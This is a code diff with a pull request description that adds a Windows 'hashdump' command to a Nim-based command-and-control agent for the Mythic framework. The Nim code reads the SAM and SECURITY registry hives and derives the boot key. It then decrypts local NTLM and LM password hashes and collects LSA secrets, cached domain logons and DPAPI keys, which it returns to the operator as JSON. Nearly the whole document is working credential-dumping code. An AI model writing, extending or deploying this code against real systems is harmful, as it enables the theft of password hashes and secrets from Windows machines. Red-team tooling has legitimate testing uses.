+    buf = newSeq[byte](bufSize)
+
+    status = NtEnumerateKeyProc(hKey,index,KeyBasicInformation,cast[PVOID](addr buf[0]),bufSize,addr bufSize)
+
+    if status == 0:
+      pInfo = cast[PKEY_BASIC_INFORMATION](addr buf[0])
+      nameLen = pInfo.NameLength div sizeof(WCHAR).ULONG
+      pName = cast[ptr UncheckedArray[WCHAR]](addr pInfo.Name)
+
+      name = ""
+      for i in 0 ..< nameLen.int:
+        name.add(cast[char](pName[i]))
+
+      if(cmpIgnoreCase(name,"NL$Control") != 0):
+        listOfLSASecrets.add(name)
+    inc index
+  discard NtCloseProc(hKey)
+  for lsaSecretString in listOfLSASecrets:
+    if(cmpIgnoreCase(lsaSecretString,"NL$KM") == 0):
+      secretBlob = NewLsaSecretBlob(nlkmKey)
+      if(secretBlob.Length > 0):
+        recordLsaSecret(result, lsaSecretString,secretBlob)
+    else:
+      secretBlob = NewLsaSecretBlob(DumpSecret("\\Registry\\Machine\\SECURITY\\Policy\\Secrets\\"&lsaSecretString&"\\CurrVal",decryptedLsaKey))
+      if(secretBlob.Length > 0):
+        recordLsaSecret(result, lsaSecretString,secretBlob)
+  
+
+proc collectSamDump(result: var HashdumpResult) = 
+  var 
+    index: ULONG = 0
+    buf:seq[byte]
+    status: NTSTATUS
+    bufSize: ULONG
+    pInfo:PKEY_BASIC_INFORMATION
+    nameLen:ULONG
+    name:string = ""
+    pName: ptr UncheckedArray[WCHAR]
+    hKey = OpenRegistryWithNtOpenKeyEx("\\Registry\\Machine\\SAM\\SAM\\Domains\\Account\\Users")
+    listOfUserKeys:seq[string] = @[]
+    vValueUser:seq[byte]
+    userRIDByteArray:array[4,byte]
+    userRIDUint:uint32
+    offset:int
+    length:int
+    lmHashOffset:int
+    lmHashLength:int
+    ntHashOffset:int
+    ntHashLength:int
+    usernameWstring:wstring
+    antpassword:seq[byte] = cast[seq[byte]]("NTPASSWORD\0")
+    almpassword:seq[byte] = cast[seq[byte]]("LMPASSWORD\0")
+    hashedBootKey:seq[byte] = GetHashedBootKey(GetSysKey(), GetBootKey())
+    lmHash:string 
+    ntHash:string
+    lmKeyParts:seq[byte] 
+    lmHashDecryptionKey:seq[byte] 
+    md5ContextVar:MD5Context
+    md5DigestVar:MD5Digest
+    ntKeyParts:seq[byte]
+    ntHashDecryptionKey:seq[byte]
+    encryptedNtHash:seq[byte]
+    obfuscatedNtHashTESTING:seq[byte]
+    encryptedLmHash:seq[byte]
+    obfuscatedLmHashTESTING:seq[byte]
+    enc_LM_Hash:seq[byte]
+    lmData:seq[byte]
+    enc_NT_Hash:seq[byte]
+    ntData:seq[byte]
+    lmHashSalt:seq[byte]
+    ntHashSalt:seq[byte]
+    desEncryptedHash:seq[byte]
+    slice:seq[byte] 
+    ridStr:string
+    hashes:string
+
+  while true:
+    bufSize = 0
+    status = NtEnumerateKeyProc(hKey,index,KeyBasicInformation,nil,0,addr bufSize)
+
+    if status == STATUS_NO_MORE_ENTRIES:
+      break
+
+    buf = newSeq[byte](bufSize)
+
+    status = NtEnumerateKeyProc(hKey,index,KeyBasicInformation,cast[PVOID](addr buf[0]),bufSize,addr bufSize)
+
+    if status == 0:
+      pInfo = cast[PKEY_BASIC_INFORMATION](addr buf[0])
+      nameLen = pInfo.NameLength div sizeof(WCHAR).ULONG
+      pName = cast[ptr UncheckedArray[WCHAR]](addr pInfo.Name)
+
+      name = ""
+      for i in 0 ..< nameLen.int:
+        name.add(cast[char](pName[i]))
+
+      if(name.startsWith("00000")):
+        listOfUserKeys.add(name)
+    inc index
+  discard NtCloseProc(hKey)
+  for userKey in listOfUserKeys:
+    lmHash = "aad3b435b51404eeaad3b435b51404ee";
+    ntHash = "31d6cfe0d16ae931b73c59d7e0c089c0";
+    userRIDUint = parseHexInt(userKey).uint32
+    copyMem(addr userRIDByteArray[0],cast[ptr byte](addr userRIDUint),4) 
+    hKey = OpenRegistryWithNtOpenKeyEx("\\Registry\\Machine\\SAM\\SAM\\Domains\\Account\\Users\\" & userKey)
+    vValueUser = GetValueWithRegQueryMultipleValuesWType(hKey,"V")
+    discard NtCloseProc(hKey)
+    offset = (cast[ptr int32](addr vValueUser[12]))[]
+    offset+=204
+    length = (cast[ptr int32](addr vValueUser[16]))[]
+    lmHashOffset = (cast[ptr int32](addr vValueUser[156]))[]
+    lmHashOffset+=204
+    lmHashLength = (cast[ptr int32](addr vValueUser[160]))[]
+    ntHashOffset = (cast[ptr int32](addr vValueUser[168]))[]
+    ntHashOffset+=204
+    ntHashLength = (cast[ptr int32](addr vValueUser[172]))[]
+    usernameWstring = newWString(0)
+    index = 0
+    while index < length:
+      usernameWstring.add(cast[WCHAR](vValueUser[index+offset]))
+      index=index+2
+    if(vValueUser[ntHashOffset + 2] == 0x01):
+      # Old Style Hashing
+      lmKeyParts = newSeq[byte](0)
+      lmHashDecryptionKey = newSeq[byte](16)
+      lmKeyParts.add(hashedBootKey[0..<16])
+      lmKeyParts.add(userRIDByteArray)
+      lmKeyParts.add(almpassword)
+      md5ContextVar.md5Init()
+      md5ContextVar.md5Update(lmKeyParts)
+      md5ContextVar.md5Final(md5DigestVar)
+      copyMem(addr lmHashDecryptionKey[0],addr md5DigestVar[0],16)
+      ntKeyParts = newSeq[byte](0)
+      ntHashDecryptionKey = newSeq[byte](16)
+      ntKeyParts.add(hashedBootKey[0..<16])
+      ntKeyParts.add(userRIDByteArray)
+      ntKeyParts.add(antpassword)
+      md5ContextVar.md5Init()
+      md5ContextVar.md5Update(ntKeyParts)
+      md5ContextVar.md5Final(md5DigestVar)
+      copyMem(addr ntHashDecryptionKey[0],addr md5DigestVar[0],16)
+      if(ntHashLength == 20):
+        encryptedNtHash = vValueUser[ntHashOffset+4..<ntHashOffset+4+16]
+        obfuscatedNtHashTESTING = RC4Encrypt(ntHashDecryptionKey,encryptedNtHash)
+        ntHash = DecryptSingleHash(obfuscatedNtHashTESTING,userKey).replace("-", "");
+      if(lmHashLength == 20):
+        encryptedLmHash = vValueUser[lmHashOffset+4..<lmHashOffset+4+16]
+        obfuscatedLmHashTESTING = RC4Encrypt(lmHashDecryptionKey,encryptedLmHash)
+        lmHash = DecryptSingleHash(obfuscatedLmHashTESTING, userKey).replace("-", "");
+    else:
+      enc_LM_Hash = vValueUser[lmHashOffset..<lmHashOffset+lmHashLength]
+      lmData = enc_LM_Hash[24..<enc_LM_Hash.len]
+      if(lmData.len>0):
+        slice = hashedBootKey[0..<16]
+        lmHashSalt = enc_LM_Hash[8..<8+16]
+        desEncryptedHash = DecryptAES_CBC(lmData,slice,lmHashSalt)
+        lmHash = DecryptSingleHash(desEncryptedHash, userKey).replace("-", "");
+      enc_NT_Hash = vValueUser[ntHashOffset..<ntHashOffset+ntHashLength]
+      ntData = enc_NT_Hash[24..<enc_NT_Hash.len]
+      if(ntData.len>0):
+        slice = hashedBootKey[0..<16]
+        ntHashSalt = enc_NT_Hash[8..<8+16]
+        desEncryptedHash = DecryptAES_CBC(ntData,slice,ntHashSalt)
+        ntHash = DecryptSingleHash(desEncryptedHash, userKey).replace("-", "");
+    ridStr = $userRIDUint
+    hashes = lmHash.toLower() & ":" & ntHash.toLower()
+    result.local_users.add(%*{"rid": ridStr, "username": $usernameWstring, "lm_hash": lmHash.toLower(), "nt_hash": ntHash.toLower(), "ntlm": hashes})
+
+proc collectHashdumpData*(): JsonNode =
+  var result = initHashdumpResult()
+  if not DynamicallyLoadFunctions():
+    raise newException(ValueError, "failed to load required registry APIs")
+  collectSamDump(result)
+  collectSecurityDump(result)
+  hashdumpResultToJson(result)

--- a/Payload_Type/poopsie/poopsie/agent_code/src/utils/hashdump_structs.nim
+++ b/Payload_Type/poopsie/poopsie/agent_code/src/utils/hashdump_structs.nim
@@ -1,0 +1,121 @@
+# Ported from SilentNimvest (MIT) - https://github.com/frkngksl/SilentNimvest
+
+import winim/lean
+import std/[json, strutils]
+
+type
+  HashdumpResult* = object
+    local_users*: seq[JsonNode]
+    cached_logons*: seq[JsonNode]
+    dpapi_machine_key*: string
+    dpapi_user_key*: string
+    nlkm*: string
+    lsa_secrets*: seq[JsonNode]
+    machine_account*: string
+
+proc initHashdumpResult*(): HashdumpResult =
+  HashdumpResult()
+
+proc hashdumpResultToJson*(r: HashdumpResult): JsonNode =
+  %*{
+    "local_users": r.local_users,
+    "cached_logons": r.cached_logons,
+    "dpapi": {"machine_key": r.dpapi_machine_key, "user_key": r.dpapi_user_key},
+    "nlkm": r.nlkm,
+    "lsa_secrets": r.lsa_secrets,
+    "machine_account": r.machine_account,
+  }
+
+type
+    KEY_INFORMATION_CLASS* = enum
+
+        KeyBasicInformation, # KEY_BASIC_INFORMATION
+        KeyNodeInformation, # KEY_NODE_INFORMATION
+        KeyFullInformation, # KEY_FULL_INFORMATION
+        KeyNameInformation, # KEY_NAME_INFORMATION
+        KeyCachedInformation, # KEY_CACHED_INFORMATION
+        KeyFlagsInformation, # KEY_FLAGS_INFORMATION
+        KeyVirtualizationInformation, # KEY_VIRTUALIZATION_INFORMATION
+        KeyHandleTagsInformation, # KEY_HANDLE_TAGS_INFORMATION
+        KeyTrustInformation, # KEY_TRUST_INFORMATION
+        KeyLayerInformation, # KEY_LAYER_INFORMATION
+        MaxKeyInfoClass
+
+    KEY_VALUE_INFORMATION_CLASS* = enum 
+        KeyValueBasicInformation,
+        KeyValueFullInformation,
+        KeyValuePartialInformation
+
+    KEY_NODE_INFORMATION_STRUCT* {.bycopy.} = object
+        LastWriteTime*: LARGE_INTEGER
+        TitleIndex*:    ULONG
+        ClassOffset*:   ULONG        
+        ClassLength*:   ULONG        
+        NameLength*:    ULONG
+        Name*:          array[1, WCHAR]  
+    
+    KEY_VALUE_BASIC_INFORMATION_STRUCT* {.bycopy.} = object
+        TitleIndex*: ULONG
+        Type*: ULONG
+        NameLength*: ULONG
+        Name*: array[1, WCHAR]
+
+
+    PKEY_NODE_INFORMATION* = ptr KEY_NODE_INFORMATION_STRUCT
+
+    KEY_BASIC_INFORMATION_STRUCT* {.pure.} = object
+        LastWriteTime*: LARGE_INTEGER
+        TitleIndex*:    ULONG
+        NameLength*:    ULONG
+        Name*:          array[1, WCHAR]
+
+    PKEY_BASIC_INFORMATION* = ptr KEY_BASIC_INFORMATION_STRUCT
+    
+    NlRecord* = object
+        UserLength*:      int16
+        DomainNameLength*: int16
+        DnsDomainLength*: int16
+        Iv*:              seq[byte]
+        EncryptedData*:   seq[byte]
+    
+    LsaSecretBlob* = object
+        Length*: uint32
+        Unk*: seq[byte]
+        Secret*: seq[byte]
+        SecretString*:wstring
+
+proc InitNlRecord*(data: seq[byte]): NlRecord =
+  result.UserLength      = cast[int16]([data[0], data[1]])
+  result.DomainNameLength = cast[int16]([data[2], data[3]])
+  result.DnsDomainLength  = cast[int16]([data[60], data[61]])
+  result.Iv              = data[64 ..< 64+16]
+  result.EncryptedData   = data[96 ..< 96+data.len-96]
+
+
+
+proc NewLsaSecretBlob*(inputData: seq[byte]): LsaSecretBlob =
+  let slice = inputData[0..<4]
+  var index:int = 0
+  result.Length = (cast[ptr uint32](addr slice[0]))[]
+  result.Unk = inputData[4 ..< 16]
+  result.Secret = inputData[16 ..< 16 + result.Length]
+  result.SecretString = newWString(0)
+  while index <  result.Secret.len:
+    result.SecretString.add(cast[WCHAR](result.Secret[index]))
+    index=index+2
+
+proc SeqToUnicode*(input: seq[byte]): string =
+  var index = 0
+  var returnValue = newWString(0)
+  while index < input.len:
+    returnValue.add(cast[WCHAR](input[index]))
+    index += 2
+  return $returnValue
+
+proc hexStringToByteArray*(s: string): seq[byte] =
+  var i = 0
+  result = newSeq[byte](0)
+  while i < s.len:
+    result.add(parseHexInt(s[i .. i+1]).byte)
+    i += 2
+  return result

--- a/Payload_Type/poopsie/poopsie/agent_code/src/utils/task_processor.nim
+++ b/Payload_Type/poopsie/poopsie/agent_code/src/utils/task_processor.nim
@@ -116,6 +116,8 @@ when defined(windows):
     import ../tasks/screenshot
   when defined(cmd_get_av):
     import ../tasks/get_av
+  when defined(cmd_hashdump):
+    import ../tasks/hashdump
   when defined(cmd_clipboard):
     import ../tasks/clipboard
   when defined(cmd_clipboard_monitor):
@@ -765,6 +767,26 @@ proc executeTask*(taskId: string, command: string, params: JsonNode): TaskExecut
             obf("status"): "error",
             obf("user_output"): obf("get_av command is only available on Windows")
           }
+
+    of obf("hashdump"):
+      when defined(cmd_hashdump):
+        when defined(windows):
+          debug "[DEBUG] Executing hashdump command"
+          result.response = hashdump(taskId, params)
+        else:
+          result.response = %*{
+            obf("task_id"): taskId,
+            obf("completed"): true,
+            obf("status"): "error",
+            obf("user_output"): obf("hashdump command is only available on Windows")
+          }
+      else:
+        result.response = %*{
+          obf("task_id"): taskId,
+          obf("completed"): true,
+          obf("status"): "error",
+          obf("user_output"): obf("hashdump was not compiled into this payload")
+        }
     
     of obf("clipboard"):
       when defined(cmd_clipboard):

--- a/Payload_Type/poopsie/poopsie/mythic/agent_functions/hashdump.py
+++ b/Payload_Type/poopsie/poopsie/mythic/agent_functions/hashdump.py
@@ -1,0 +1,38 @@
+from mythic_container.MythicCommandBase import *
+
+
+class HashdumpArguments(TaskArguments):
+
+    def __init__(self, command_line, **kwargs):
+        super().__init__(command_line, **kwargs)
+        self.args = []
+
+    async def parse_arguments(self):
+        if len(self.command_line.strip()) > 0:
+            raise Exception("hashdump takes no command line arguments.")
+
+
+class HashdumpCommand(CommandBase):
+    cmd = "hashdump"
+    needs_admin = True
+    help_cmd = "hashdump"
+    description = (
+        "Dump local SAM NTLM hashes and Security hive secrets via Silent Harvest "
+        "(SeBackupPrivilege, RegQueryMultipleValuesW). Returns structured JSON."
+    )
+    version = 1
+    author = "@haha150"
+    argument_class = HashdumpArguments
+    supported_ui_features = []
+    attributes = CommandAttributes(
+        supported_os=[SupportedOS.Windows],
+    )
+
+    async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse:
+        return PTTaskCreateTaskingMessageResponse(
+            TaskID=taskData.Task.ID,
+            Success=True,
+        )
+
+    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
+        return PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)

--- a/README.md
+++ b/README.md
@@ -54,6 +54,7 @@ Poopsie is a cross-platform C2 agent for the Mythic framework, written in Nim. I
 - `clipboard` - Get current clipboard contents (Windows)
 - `clipboard_monitor` - Monitor clipboard changes for a duration (Windows, background task)
 - `get_av` - Enumerate installed antivirus products (Windows)
+- `hashdump` - Dump local SAM NTLM hashes and Security hive secrets via Silent Harvest (Windows, elevated admin, structured JSON)
 - `portscan` - Scan hosts for open TCP ports (background task, incremental scanning)
 - `screenshot` - Capture screenshot of the desktop
 


### PR DESCRIPTION
## Summary

Adds Windows-only Mythic command `hashdump` that ports [SilentNimvest](https://github.com/frkngksl/SilentNimvest) / Silent Harvest into the Poopsie agent. Operators get structured JSON with local NTLM hashes, cached domain logons, DPAPI keys, and LSA secrets in one task. The agent auto-enables `SeBackupPrivilege` when the token has it.

## Changes

- New Nim modules: `hashdump_structs`, `hashdump_crypto`, `hashdump_harvest` (ported from upstream MIT sources)
- Task `hashdump.nim` + Mythic `hashdump.py` (`needs_admin`, no CLI args)
- `task_processor` dispatch and `poopsie.nimble` deps (`checksums`, `des`)
- README command entry

## Out of scope (v1)

- Mythic ATT&CK `attackmapping` tags (deferred per requirements)
- Browser script / plain-text SilentNimvest console formatting

## Test plan

- [ ] Rebuild Poopsie payload with `hashdump` selected in command list
- [ ] On elevated Windows lab callback, run `hashdump` and verify JSON includes `local_users` and Security-hive fields
- [ ] On medium-integrity callback, verify clear error without credential payload
- [ ] Confirm payload built without `hashdump` does not include command